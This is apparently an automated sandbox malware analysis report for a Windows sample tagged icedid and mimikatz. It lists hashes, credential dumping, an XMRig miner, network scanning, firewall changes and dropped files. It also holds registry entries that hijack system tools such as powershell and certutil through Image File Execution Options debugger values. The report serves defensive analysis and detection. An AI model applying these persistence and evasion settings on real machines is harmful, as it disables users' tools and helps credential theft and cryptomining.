Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-10-2024 12:45
Behavioral task
behavioral1
Sample
2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe
-
Size
10.3MB
-
MD5
a168b9ba655f69660067784207bb3308
-
SHA1
9915422d1ec9b3fd7535fbae3289d00e9610478e
-
SHA256
1c7a2b73029f5e3b4ea860219bc7aecc9c2e3f97d408fe45bd546059c0e1a5a2
-
SHA512
170d106132fac2179de7159a8f1f4d496df33ef889d25a1a80a28b9c615df5060f0e9def4ac2f196b08fd407643cce87815bd35535aabff9066d46325568fa3d
-
SSDEEP
196608:7po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:agjz0E57/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
cmlkkib.exedescription pid Process procid_target PID 4744 created 1788 4744 cmlkkib.exe 37 -
Contacts a large (28408) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/5088-177-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig behavioral2/memory/5088-181-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig behavioral2/memory/5088-202-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig behavioral2/memory/5088-215-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig behavioral2/memory/5088-224-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig behavioral2/memory/5088-233-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig behavioral2/memory/5088-248-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig behavioral2/memory/5088-256-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig behavioral2/memory/5088-268-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig behavioral2/memory/5088-377-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig behavioral2/memory/5088-378-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig behavioral2/memory/5088-381-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/656-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/656-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023c65-6.dat mimikatz behavioral2/memory/4156-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2856-138-0x00007FF73CB30000-0x00007FF73CC1E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
cmlkkib.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts cmlkkib.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts cmlkkib.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
cmlkkib.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe cmlkkib.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 4376 netsh.exe 380 netsh.exe -
Executes dropped EXE 29 IoCs
Processes:
cmlkkib.execmlkkib.exewpcap.execbftscrnu.exevfshost.exeunnsehtzr.exexohudmc.exevarpws.exegktgmq.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.execmlkkib.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exeunnsehtzr.exetgkfgfrve.execmlkkib.exepid Process 4156 cmlkkib.exe 4744 cmlkkib.exe 3804 wpcap.exe 4064 cbftscrnu.exe 2856 vfshost.exe 4868 unnsehtzr.exe 2424 xohudmc.exe 824 varpws.exe 5088 gktgmq.exe 3592 unnsehtzr.exe 380 unnsehtzr.exe 1908 unnsehtzr.exe 4312 unnsehtzr.exe 4724 unnsehtzr.exe 3160 cmlkkib.exe 4836 unnsehtzr.exe 552 unnsehtzr.exe 1320 unnsehtzr.exe 3448 unnsehtzr.exe 5100 unnsehtzr.exe 4324 unnsehtzr.exe 1548 unnsehtzr.exe 3616 unnsehtzr.exe 1500 unnsehtzr.exe 1412 unnsehtzr.exe 2772 unnsehtzr.exe 444 unnsehtzr.exe 4676 tgkfgfrve.exe 6132 cmlkkib.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.execbftscrnu.exepid Process 3804 wpcap.exe 3804 wpcap.exe 3804 wpcap.exe 3804 wpcap.exe 3804 wpcap.exe 3804 wpcap.exe 3804 wpcap.exe 3804 wpcap.exe 3804 wpcap.exe 4064 cbftscrnu.exe 4064 cbftscrnu.exe 4064 cbftscrnu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 84 ifconfig.me 85 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
cmlkkib.exewpcap.exexohudmc.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content cmlkkib.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache cmlkkib.exe File opened for modification C:\Windows\SysWOW64\varpws.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 cmlkkib.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF cmlkkib.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\varpws.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData cmlkkib.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023cb6-134.dat upx behavioral2/memory/2856-135-0x00007FF73CB30000-0x00007FF73CC1E000-memory.dmp upx behavioral2/memory/2856-138-0x00007FF73CB30000-0x00007FF73CC1E000-memory.dmp upx behavioral2/files/0x0007000000023cc1-141.dat upx behavioral2/memory/4868-142-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/4868-159-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/files/0x0007000000023cbe-163.dat upx behavioral2/memory/5088-164-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/3592-170-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/380-174-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/5088-177-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/1908-179-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/5088-181-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/4312-184-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/4724-188-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/4836-196-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/552-200-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/5088-202-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/1320-205-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/3448-209-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/5100-213-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/5088-215-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/4324-218-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/1548-222-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/5088-224-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/3616-227-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/1500-230-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/1412-232-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/5088-233-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/2772-235-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/444-237-0x00007FF62FE60000-0x00007FF62FEBB000-memory.dmp upx behavioral2/memory/5088-248-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/5088-256-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/5088-268-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/5088-377-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/5088-378-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx behavioral2/memory/5088-381-0x00007FF7017C0000-0x00007FF7018E0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.execmlkkib.exetgkfgfrve.execmd.exedescription ioc Process File opened for modification C:\Windows\mnvzbkud\cmlkkib.exe 2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\schoedcl.exe cmlkkib.exe File opened for modification C:\Windows\mnvzbkud\spoolsrv.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\AppCapture32.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\crli-0.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\tucl-1.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\docmicfg.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\Corporate\mimidrv.sys cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\wpcap.dll cmlkkib.exe File opened for modification C:\Windows\mnvzbkud\schoedcl.xml cmlkkib.exe File opened for modification C:\Windows\vsjtbfmcn\nifklhuyf\Result.txt tgkfgfrve.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\tibe-2.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\vimpcsvc.exe cmlkkib.exe File created C:\Windows\mnvzbkud\vimpcsvc.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\upbdrjv\swrpwe.exe cmlkkib.exe File opened for modification C:\Windows\vsjtbfmcn\nifklhuyf\Packet.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\zlib1.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\spoolsrv.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\spoolsrv.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\vimpcsvc.xml cmlkkib.exe File opened for modification C:\Windows\vsjtbfmcn\Corporate\log.txt cmd.exe File created C:\Windows\vsjtbfmcn\Corporate\vfshost.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\exma-1.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\trch-1.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\svschost.xml cmlkkib.exe File opened for modification C:\Windows\mnvzbkud\svschost.xml cmlkkib.exe File created C:\Windows\mnvzbkud\docmicfg.xml cmlkkib.exe File opened for modification C:\Windows\mnvzbkud\docmicfg.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\Shellcode.ini cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\AppCapture64.dll cmlkkib.exe File created C:\Windows\mnvzbkud\cmlkkib.exe 2024-10-22_a168b9ba655f69660067784207bb3308_hacktools_icedid_mimikatz.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\posh-0.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\schoedcl.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\docmicfg.xml cmlkkib.exe File created C:\Windows\ime\cmlkkib.exe cmlkkib.exe File created C:\Windows\mnvzbkud\svschost.xml cmlkkib.exe File created C:\Windows\mnvzbkud\spoolsrv.xml cmlkkib.exe File created C:\Windows\mnvzbkud\schoedcl.xml cmlkkib.exe File opened for modification C:\Windows\mnvzbkud\vimpcsvc.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\wpcap.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\Packet.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\docmicfg.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\svschost.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\libxml2.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\xdvl-0.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\svschost.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\cbftscrnu.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\coli-0.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\vimpcsvc.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\tgkfgfrve.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\ucl.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\scan.bat cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\schoedcl.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\Corporate\mimilib.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\ip.txt cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\cnli-1.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\ssleay32.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\trfo-2.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\spoolsrv.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\libeay32.dll cmlkkib.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 4136 sc.exe 2012 sc.exe 1396 sc.exe 2052 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
